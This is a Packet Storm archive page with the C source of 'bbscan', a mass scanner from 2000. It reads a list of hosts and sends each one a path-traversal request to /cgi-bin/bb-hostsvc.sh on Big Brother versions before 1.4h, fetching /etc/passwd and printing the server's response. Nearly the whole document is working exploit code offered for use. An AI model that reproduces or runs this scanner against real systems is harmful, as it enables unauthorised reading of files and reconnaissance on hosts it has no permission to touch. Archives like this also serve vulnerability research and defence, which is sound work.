Big Brother Scanner - scans for /cgi-bin/bb-hostsvc.sh which allows reading of any file on the system running Big Brother prior to version 1.4h.
5b760b555749e0bc228d293b9b05df55bbf2a42dcb3ab1727c7907a857069a84/**** bbscan.c ****/
/*
*
* 2000-07-11
*
* Ripped from phfscan.c
* Big Brother Vulnarability scanner.
* Scans for /cgi-bin/bb-hostsvc.sh.
* If it exists you might be able to read files from
* the system. Good luck.
*
*
* Author: Safety@IRCnet who also discovered the bug.
* Safety@LinuxMail.ORG
*
*
* Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
* Bjurr, Metoo, and everyone else who think they should
* be on this list.
*
* Special Thanks goes to Loki who are going to host and design
* my homepage.
*
*
* Usage:
*
* ./bbscan < hostlist > outputfile
*
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}
main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;
char bbvuln[]="GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;
nametocheck = gethostbyname (hosta);
/* Ugly stuff to get host name into inet_ntoa form */
(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],
sizeof (outgoing.s_addr));
strncpy(host, inet_ntoa (outgoing), 100);
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;
alarm(10);
X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);
if(FLAG == 1 && X==0){
write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0)
write(1,FileBuf,X);
}
close (outsocket);
}
return 0;
}
**** EOF ****
--
Get your free email from www.linuxmail.org
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed